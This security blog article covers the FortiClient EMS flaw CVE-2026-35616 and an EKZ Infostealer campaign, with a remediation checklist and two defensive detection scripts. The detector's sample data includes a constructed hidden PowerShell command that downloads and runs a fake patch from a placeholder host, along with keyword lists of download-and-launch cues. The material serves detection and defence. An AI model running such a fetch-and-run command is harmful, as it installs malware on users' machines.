CVE-2026-35616: Attackers Are Using FortiClient EMS to Push Credential-Stealing Malware Across Australian Business Networks
Attackers are actively exploiting a critical flaw in Fortinet's FortiClient Endpoint Management Server (EMS) to silently deliver credential-stealing malware to every device the server manages. The vulnerability — tracked as CVE-2026-35616 with a CVSS score of 9.1 — allows an unauthenticated attacker to hijack the management server, modify its configuration, and push malicious updates disguised as legitimate Fortinet patches to managed endpoints. The Australian Cyber Security Centre (ACSC) has issued guidance for Australian organisations; if your business uses FortiClient EMS, this requires immediate action.
The CVE-2026-35616 Campaign: What Researchers Found
Threat intelligence researchers at Arctic Wolf published a detailed account in May 2026 of a threat cluster actively exploiting CVE-2026-35616 in FortiClient EMS deployments. The attackers compromised EMS servers — the centralised management consoles that organisations use to provision endpoint security and VPN access across their workforce — and used them as a distribution channel for a previously undocumented credential stealer dubbed EKZ Infostealer.
The vulnerability was first exploited in the wild as a zero-day on 31 March 2026, according to evidence from security honeypots. Fortinet confirmed active exploitation in early April and released emergency hotfixes for the affected versions (7.4.5 and 7.4.6). The US Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2026-35616 to its Known Exploited Vulnerabilities (KEV) catalogue on 6 April 2026, ordering federal agencies to apply the fixes within three days — a strong indicator of the flaw's severity and exploitability in the hands of active threat actors.
The Shadowserver Foundation reported approximately 2,000 internet-exposed FortiClient EMS instances at the time of disclosure. Despite the emergency hotfixes and the CISA directive, exploitation continued through May 2026. Security researchers at Bleeping Computer and The Hacker News documented fresh attack activity deploying the EKZ payload, with the campaign specifically targeting organisations that had not yet patched or applied the hotfix.
The Australian Signals Directorate's ACSC has specifically advised Australian organisations to review their networks for vulnerable versions, apply patches as soon as practicable, and monitor for suspicious activity. The ACSC advisory notes that activity was observed in May 2026 and the vulnerability remains under active exploitation.
CVE-2026-35616 was discovered independently by Simo Kohonen of Defused Cyber and Nguyen Duc Anh. It carries a CVSS 3.1 base score of 9.1 (Critical) and is officially classified under CWE-284 (Improper Access Control). The Fortinet PSIRT advisory tracking this issue is FG-IR-26-099.
Why This Is a Supply-Chain-Style Threat to Australian Businesses
What makes CVE-2026-35616 particularly concerning is not merely the vulnerability itself, but the position that FortiClient EMS occupies in an organisation's network. FortiClient EMS is the management hub — the server that tells every managed endpoint what security policies to apply, what software to run, and what VPN settings to use. Compromise it, and you compromise everything downstream.
This is effectively a supply-chain-style attack path, except the compromised component is your own security infrastructure. When attackers modify EMS configuration and VPN policies on a vulnerable server, every endpoint that checks in — laptops, desktops, remote workers' machines — becomes a potential malware delivery target without any further exploitation step required.
For Australian small and medium businesses, the risk is compounded by the sector's heavy reliance on managed service providers (MSPs). Many Australian SMBs outsource their IT security to MSPs, and some of those MSPs use FortiClient EMS to manage hundreds of client endpoints from a single console. A single compromised MSP instance can propagate malicious payloads across dozens of separate businesses within minutes of an endpoint checking in.
The ACSC advisory does not name specific affected industries, but confirms that products managed by MSPs have been among those impacted. If your business has an MSP relationship and that provider uses Fortinet's endpoint management stack, asking directly whether their FortiClient EMS is fully patched and free of unauthorised configuration changes is a reasonable and necessary question.
Beyond the supply-chain risk, credential theft has immediate and compounding consequences. EKZ Infostealer specifically targets saved passwords, session tokens, and payment autofill data stored in browsers. Stolen session cookies bypass multi-factor authentication entirely by replaying the authenticated session rather than re-authenticating. Stolen saved passwords open the door to business email compromise, banking portal access, and cloud service hijacking. For a small business operator in Australia, these are not abstract risks — they are the documented precursors to financial fraud and notifiable data breaches under the Privacy Act 1988.
Inside the Attack: From API Bypass to Silent Credential Extraction
The Vulnerability — Unauthenticated API Access
CVE-2026-35616 is an improper access control vulnerability (CWE-284) present in FortiClient EMS versions 7.4.5 and 7.4.6. It allows an unauthenticated remote attacker to bypass API authentication entirely and send privileged API requests to the server — granting the same level of access as a legitimate administrator without supplying any credentials.
This class of flaw is especially dangerous in endpoint management software because API access equates to administrative control: the ability to read, modify, and push configuration changes to every managed endpoint simultaneously. In normal operation, only authorised administrators should reach this API. The missing access control check means any internet-connected attacker who can reach the server on its management port can bypass that requirement.
The Delivery Mechanism — Weaponising FortiClient's Update Process
Once an attacker has API access, the documented attack chain from Arctic Wolf's research works as follows:
- The attacker modifies EMS configuration and VPN policies on the compromised server.
- When an endpoint device establishes a routine IPsec VPN tunnel — a normal, trusted event from the endpoint's perspective — the legitimate Fortinet process fortitray.exe is directed to execute malicious batch scripts injected into the policy.
- These batch scripts execute a base64-encoded PowerShell payload.
- The PowerShell payload downloads a file disguised as a standard Fortinet patch update and executes it silently.
The masquerade as a vendor patch is deliberate. Users and security monitoring tools are less likely to flag a file named to resemble a Fortinet update, particularly on machines that are already managed by Fortinet's own tooling. The malicious payload arrives through the same trusted channel that delivers legitimate updates.
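The chain above (fortitray.exe, then a batch script, then base64-encoded PowerShell that fetches and runs a fake patch) leaves a distinctive process lineage on the endpoint. The script below is an added detection example written for this post; it is not Arctic Wolf's, Fortinet's or any EDR vendor's code. It works on process-creation events in a generic shape (real telemetry such as Sysmon Event ID 1 or an EDR's process feed would be mapped into ProcEvent first), decodes any -EncodedCommand argument the way PowerShell does (base64 over UTF-16LE), looks for download-and-launch cues in the decoded script, and rates the finding higher when the ancestry runs through cmd.exe executing a .bat under fortitray.exe. The hostnames, PIDs, file paths and URL in the sample events are invented for the demonstration.

```python
"""Process-lineage check for the fortitray.exe -> .bat -> encoded PowerShell chain.

Added, constructed example; not Arctic Wolf's, Fortinet's or any EDR's code.
Events use a generic shape; map real telemetry into ProcEvent before use.
"""
import base64
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    host: str
    pid: int
    ppid: int
    image: str      # lower-case executable basename
    cmdline: str


# Cues in a decoded script that it fetches and/or launches something.
DOWNLOAD_CUES = ("invoke-webrequest", "downloadfile", "downloadstring",
                 "start-process", "invoke-expression", "iex")
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})",
                      re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Return the script behind -EncodedCommand, or None if there is none.

    PowerShell expects base64 over UTF-16LE text, so decode accordingly."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def ancestry(event, by_key, max_depth=6):
    """Return [event, parent, grandparent, ...], stopping at an unknown pid."""
    chain = [event]
    cur = event
    for _ in range(max_depth):
        parent = by_key.get((cur.host, cur.ppid))
        if parent is None:
            break
        chain.append(parent)
        cur = parent
    return chain


def find_delivery_chains(events):
    """Flag PowerShell launched with an encoded command whose decoded body
    carries a download/launch cue; 'high' when cmd.exe ran a .bat and
    fortitray.exe sits above it in the lineage, 'medium' otherwise."""
    by_key = {(e.host, e.pid): e for e in events}
    findings = []
    for e in events:
        if e.image != "powershell.exe":
            continue
        script = decode_encoded_command(e.cmdline)
        if script is None:
            continue
        cues = [c for c in DOWNLOAD_CUES if c in script.lower()]
        if not cues:
            continue
        chain = ancestry(e, by_key)
        images = [p.image for p in chain]
        via_batch = any(p.image == "cmd.exe" and ".bat" in p.cmdline.lower()
                        for p in chain)
        from_fortitray = "fortitray.exe" in images
        findings.append({
            "host": e.host,
            "pid": e.pid,
            "chain": images,
            "cues": cues,
            "severity": "high" if (from_fortitray and via_batch) else "medium",
        })
    return findings


def _enc(script):
    """Encode text the way -EncodedCommand expects (used to build the sample)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed sample: one chain matching the described pattern, plus a benign
# encoded command launched from Explorer that must not be flagged.
SAMPLE_SCRIPT = ("Invoke-WebRequest -Uri https://updates.example.invalid/FortiClientPatch.exe "
                 "-OutFile $env:TEMP\\fcpatch.exe; Start-Process $env:TEMP\\fcpatch.exe")
SAMPLE_EVENTS = [
    ProcEvent("WS-07", 400, 1, "fortitray.exe",
              r"C:\Program Files\Fortinet\FortiClient\FortiTray.exe"),  # path assumed
    ProcEvent("WS-07", 520, 400, "cmd.exe", r'cmd.exe /c "C:\Users\Public\vpn_policy.bat"'),
    ProcEvent("WS-07", 611, 520, "powershell.exe",
              "powershell.exe -nop -w hidden -EncodedCommand " + _enc(SAMPLE_SCRIPT)),
    ProcEvent("WS-07", 700, 1, "explorer.exe", "explorer.exe"),
    ProcEvent("WS-07", 710, 700, "powershell.exe",
              "powershell.exe -EncodedCommand " + _enc("Get-Date")),
]

if __name__ == "__main__":
    for finding in find_delivery_chains(SAMPLE_EVENTS):
        print(finding)
```

On the sample input this reports a single high-severity finding for pid 611 with the lineage powershell.exe, cmd.exe, fortitray.exe; the Explorer-launched Get-Date command decodes cleanly but carries no download cue and is ignored. Keying processes by (host, pid) rather than pid alone matters once events from many endpoints are pooled, because PIDs repeat across machines.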
The Payload — EKZ Infostealer Capabilities
The EKZ Infostealer is a purpose-built credential harvesting tool with capabilities that target the browser stores most commonly in use across Australian workplaces:
- Google Chrome: EKZ implements bypass techniques targeting Chrome's App-Bound encryption, a protection mechanism introduced specifically to resist credential theft from outside the browser process. That EKZ can circumvent this indicates active, current development by its authors — this is not an off-the-shelf tool repurposed from older campaigns.
- Mozilla Firefox: Credential extraction from Firefox's encrypted credential storage.
- Autofill data: Credit card numbers, billing addresses, and phone numbers stored in browser autofill profiles — the same data used to make online purchases and to answer identity verification questions.
- Session cookies: Authentication tokens that keep users logged in to web services. Stolen session cookies can be replayed to impersonate a victim without requiring their password or any second authentication factor.
All harvested data is exfiltrated to a threat-actor-controlled Virtual Private Server (VPS). The full infection and exfiltration chain can complete in seconds from the moment an endpoint checks in with the compromised EMS server.
What to Do Now: A Prioritised Checklist for Australian Businesses
If your organisation runs FortiClient EMS on-premises, work through the following steps in order:
1. Update to FortiClient EMS 7.4.7 or later immediately.
Fortinet has released version 7.4.7, which fully remediates CVE-2026-35616. Versions 7.4.5 and 7.4.6 are the confirmed affected versions. Updating is the single most important action and should be treated as emergency patching regardless of your normal change-management schedule.
2. Apply the emergency hotfix if an immediate full update is not possible.
Fortinet released emergency hotfixes specifically for versions 7.4.5 and 7.4.6 within days of confirming exploitation. These are available via the Fortinet PSIRT advisory FG-IR-26-099. Apply the hotfix now and schedule the full version update for the earliest available maintenance window.
3. Hunt for indicators of compromise before assuming you are clean.
Arctic Wolf's research on CVE-2026-35616 includes indicators of compromise (IOCs) covering file hashes, PowerShell signatures, and known exfiltration infrastructure used by the EKZ campaign. Review your EMS server logs for: unauthorised modifications to VPN policies; unexpected entries in the software deployment or endpoint configuration queue; and outbound connections from managed endpoints to unfamiliar VPS addresses, particularly shortly after VPN tunnel establishment.
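Two of the review items in step 3 (policy changes by an unexpected actor, and endpoints reaching unfamiliar addresses shortly after a VPN tunnel comes up) can be expressed as a simple correlation over time-ordered events. The script below is an added example written for this post, not Fortinet's or Arctic Wolf's tooling. The log format it parses is constructed for the demonstration and is not FortiClient EMS's or FortiClient's real schema; you would map your EMS audit log and endpoint network telemetry into the three event kinds it understands (ems_policy_change, vpn_tunnel_up, net_conn). The trusted network ranges, admin names, hostnames and IP addresses are all assumptions.

```python
"""Correlate VPN tunnel establishment with follow-on egress, and spot policy
changes by unknown actors.

Added, constructed example. The line format, network ranges, admin names,
hosts and addresses below are invented; map real EMS audit and endpoint
network logs into these three event kinds before use.
"""
import ipaddress
import re
from datetime import datetime, timedelta

LINE = re.compile(r"^(?P<ts>\S+) host=(?P<host>\S+) event=(?P<event>\S+)(?P<rest>.*)$")
KV = re.compile(r"(\w+)=(\S+)")

# Assumed: RFC 1918 space plus a constructed range standing in for the
# organisation's own VPN gateway / EMS subnet. Anything else is "unfamiliar".
TRUSTED_NETS = [ipaddress.ip_network(n) for n in
                ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "198.51.100.0/24")]
# Assumed: the accounts that are allowed to change EMS policy.
KNOWN_ADMINS = {"jsmith", "svc-ems-backup"}


def parse_line(line):
    """Turn one constructed log line into a dict, or None if it does not match."""
    m = LINE.match(line.strip())
    if not m:
        return None
    rec = {
        "ts": datetime.fromisoformat(m.group("ts").replace("Z", "+00:00")),
        "host": m.group("host"),
        "event": m.group("event"),
    }
    rec.update(dict(KV.findall(m.group("rest"))))
    return rec


def is_unfamiliar(dst):
    """True when the destination is outside every trusted range."""
    ip = ipaddress.ip_address(dst)
    return not any(ip in net for net in TRUSTED_NETS)


def hunt(lines, window=timedelta(seconds=120)):
    """Return findings for (a) EMS policy changes by an actor not in
    KNOWN_ADMINS and (b) egress to an unfamiliar address within `window`
    of that host's most recent VPN tunnel coming up."""
    recs = [r for r in (parse_line(l) for l in lines) if r]
    recs.sort(key=lambda r: r["ts"])
    findings = []
    last_tunnel = {}  # host -> timestamp of most recent vpn_tunnel_up
    for r in recs:
        if r["event"] == "vpn_tunnel_up":
            last_tunnel[r["host"]] = r["ts"]
        elif r["event"] == "net_conn":
            t = last_tunnel.get(r["host"])
            if t is not None and r["ts"] - t <= window and is_unfamiliar(r["dst"]):
                findings.append({
                    "kind": "post_vpn_unfamiliar_egress",
                    "host": r["host"],
                    "dst": r["dst"],
                    "seconds_after_tunnel": int((r["ts"] - t).total_seconds()),
                })
        elif r["event"] == "ems_policy_change":
            if r.get("actor") not in KNOWN_ADMINS:
                findings.append({
                    "kind": "policy_change_unknown_actor",
                    "host": r["host"],
                    "actor": r.get("actor"),
                    "object": r.get("object"),
                })
    return findings


# Constructed sample. "actor=anonymous" is a stand-in for a change made through
# the unauthenticated API; check how your own EMS audit log records such an actor.
SAMPLE_LOG = """
2026-05-12T08:55:10Z host=EMS01 event=ems_policy_change actor=jsmith object=vpn_policy/Corp-IPsec
2026-05-12T09:02:41Z host=EMS01 event=ems_policy_change actor=anonymous object=vpn_policy/Corp-IPsec
2026-05-12T09:14:02Z host=WS-07 event=vpn_tunnel_up gateway=198.51.100.10
2026-05-12T09:14:05Z host=WS-07 event=net_conn dst=198.51.100.10 dport=443
2026-05-12T09:14:09Z host=WS-07 event=net_conn dst=203.0.113.45 dport=443
2026-05-12T09:31:00Z host=WS-07 event=net_conn dst=203.0.113.45 dport=443
2026-05-12T09:40:00Z host=WS-12 event=vpn_tunnel_up gateway=198.51.100.10
2026-05-12T09:40:03Z host=WS-12 event=net_conn dst=10.20.0.5 dport=445
""".strip().splitlines()

if __name__ == "__main__":
    for finding in hunt(SAMPLE_LOG):
        print(finding)
```

Run against the sample, this yields two findings: the policy change by "anonymous" on EMS01, and WS-07 contacting 203.0.113.45 seven seconds after its tunnel came up. The later connection from WS-07 to the same address falls outside the 120-second window and is deliberately not flagged; a repeat contact is worth its own follow-up, but the point of the window is to surface the tight coupling between check-in and egress that the campaign description emphasises. WS-12's connection to an internal file server is within trusted space and is ignored.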
4. Restrict EMS management interface access.
The Shadowserver Foundation found approximately 2,000 internet-exposed EMS instances. If your EMS server's management interface is accessible from the public internet rather than restricted to your internal network or a dedicated management network, this is a secondary but urgent remediation step. Firewall rules or access control lists should limit access to known administrator IP addresses or an internal management VLAN.
5. If you use an MSP, ask directly.
Contact your managed service provider and ask specifically: are you running FortiClient EMS, and if so, what version? Have you reviewed your EMS logs for CVE-2026-35616 indicators? What is your patching SLA for critical vulnerabilities on management infrastructure? A provider that cannot answer these questions clearly warrants a follow-up conversation about their security posture.
6. Reset credentials if compromise is suspected.
If you have any reason to believe your endpoints may have been reached by the EKZ campaign — particularly if they were managed by an EMS server running an affected version during March–May 2026 — assume browser-stored credentials have been harvested and reset passwords for email accounts, cloud services, banking portals, and any system accessible from affected devices. Notify your financial institution if credit card autofill data was present in browsers on affected machines.
Note: FortiClient Cloud (the SaaS-hosted version of EMS) is not affected by CVE-2026-35616 and requires no action. The vulnerability is specific to on-premises deployments.
The ACSC can be contacted on 1300 CYBER1 (1300 292 371) for incident assistance. The ACSC alerts and advisories page provides the most current guidance for Australian organisations.
Fortinet Products Under Fire — and What Australian Businesses Should Learn
CVE-2026-35616 is not an isolated incident for Fortinet, nor is it an isolated pattern across the security industry. Over the past two years, Fortinet products have been a consistent focus for advanced threat actors:
- CVE-2024-21762 (FortiGate SSL-VPN): A critical remote code execution flaw exploited by state-sponsored actors before patches were widely applied.
- CVE-2024-47575 (FortiManager): A zero-day that was exploited before Fortinet publicly disclosed it, affecting the centralised network management system.
- CVE-2026-35616 (FortiClient EMS): This campaign, completing a pattern of attackers progressively targeting every layer of Fortinet's management stack.
The pattern is deliberate. Attackers focus on network management, endpoint management, and VPN gateway products because these systems occupy privileged positions in organisational networks. Once compromised, they provide a trusted, high-bandwidth channel to reach every other device without triggering the alarms that would fire if an attacker attempted to compromise endpoints one by one from the outside.
For Australian businesses and IT managers, this pattern points to several hardening priorities that apply regardless of which vendor's products you use:
Limit management interface exposure. No management console — FortiClient EMS, cPanel, GitLab, or any other centralised administration tool — should be reachable directly from the public internet. Many of the critical vulnerabilities affecting Australian businesses in 2026 were only exploitable because management interfaces were internet-facing. Place management consoles behind a separate access control network or dedicated administration channel, and audit your firewall rules accordingly.
Apply ACSC Essential Eight patch management timelines. The Essential Eight's patch management guidance recommends remediating critical vulnerabilities within 48 hours on internet-facing services. CVE-2026-35616 had a hotfix available within days of Fortinet confirming exploitation — organisations that applied patches within the 48-hour window were substantially protected before the major EKZ campaign reached its peak in May 2026. The 48-hour standard is not theoretical; this campaign demonstrates it is operationally meaningful.
Treat browser-stored credentials as a liability. The EKZ infostealer — like Vidar, RedLine, and other credential stealers that have featured in recent ACSC advisories — specifically targets browser-saved passwords because they represent low-effort, high-yield collection. Browser credential stores were designed for convenience, not for security under an active, targeted attack. Training staff not to save passwords to browsers, and instead using a dedicated encrypted credential store, materially reduces the blast radius when an endpoint is compromised — whether via FortiClient EMS, a phishing email, or any other initial access vector.
Audit managed device estates regularly. Whether you manage your own endpoints or rely on an MSP, periodically confirming that management infrastructure is on a current, patched version is as important as patching the endpoints themselves. A vulnerability in the management plane can render endpoint patching irrelevant.
The ACSC alerts and advisories page is the most reliable first-notification channel for Australian organisations. Subscribing to ACSC alerts via cyber.gov.au/about-us/register means guidance arrives before general media coverage reaches broad audiences — the difference can be the margin between patching before exploitation and responding to a confirmed breach.
The views expressed in this article are editorial opinion and general information only. They do not constitute professional security, legal, or financial advice. Always verify details with primary sources and consult a qualified professional before making security decisions based on this content.